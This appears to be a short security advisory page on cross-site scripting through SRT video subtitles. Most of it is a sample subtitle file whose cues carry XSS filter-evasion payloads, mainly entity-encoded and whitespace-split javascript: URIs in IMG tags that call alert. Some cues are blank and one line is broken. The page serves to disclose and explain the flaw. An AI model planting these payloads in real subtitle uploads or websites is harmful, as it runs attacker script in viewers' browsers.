Xss in subtitle

Description
It is possible for an attacker to execute JavaScript in a video's subtitle. This is also referred to as XSS (Cross-Site Scripting).if a website load subtitle separately in browser then a attacker can run any html or javascript in video subtitle. It has been tested on some video services.

Examples
the attacker can save the mentioned contents below by the format of srt and upload prepared srt file as a video's subtitles

1 00:00:37,618 --> 00:00:42,557 : '';!--"=&{}

2 00:00:58,425 --> 00:01:00,704 

3 00:01:00,705 --> 00:01:01,873 

4 00:01:02,225 --> 00:01:04,519 

5 00:01:04,520 --> 00:01:05,547 

6 00:01:05,864 --> 00:01:08,117 

7 00:01:08,224 --> 00:01:09,223 alert("XSS")">

8 00:01:09,224 --> 00:01:10,434 

9 00:01:11,384 --> 00:01:12,427 

10 00:01:15,504 --> 00:01:17,506 

11 00:01:19,743 --> 00:01:20,786 

12 00:01:24,183 --> 00:01:25,351 

13 00:01:40,663 --> 00:01:41,705 

14 00:01:42,703 --> 00:01:45,742 <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; &#39;&#88;&#83;&#83;&#39;&#41;>

15 00:01:45,743 --> 00:01:46,285 <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
 * 1) 0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

16 00:01:48,503 --> 00:01:49,545 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

17 00:01:49,582 --> 00:01:51,709 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

18 00:01:54,822 --> 00:01:58,200 <IMG SRC="jav&#x09;ascript:alert('XSS');">

19 00:02:01,021 --> 00:02:03,691 <IMG SRC="jav&#x0A;ascript:alert('XSS');">

20 00:02:04,702 --> 00:02:05,744 <IMG SRC="jav&#x0D;ascript:alert('XSS');">

21 00:02:15,700 --> 00:02:18,536 <IMG SRC="javascript:alert('XSS')"

22 00:02:18,740 --> 00:02:22,619 \";alert('XSS');//

= Authors and Primary Editors =

Mohammad MortazaviZade - 2mzrp2@gmail.com

Related Attacks
XSS Attacks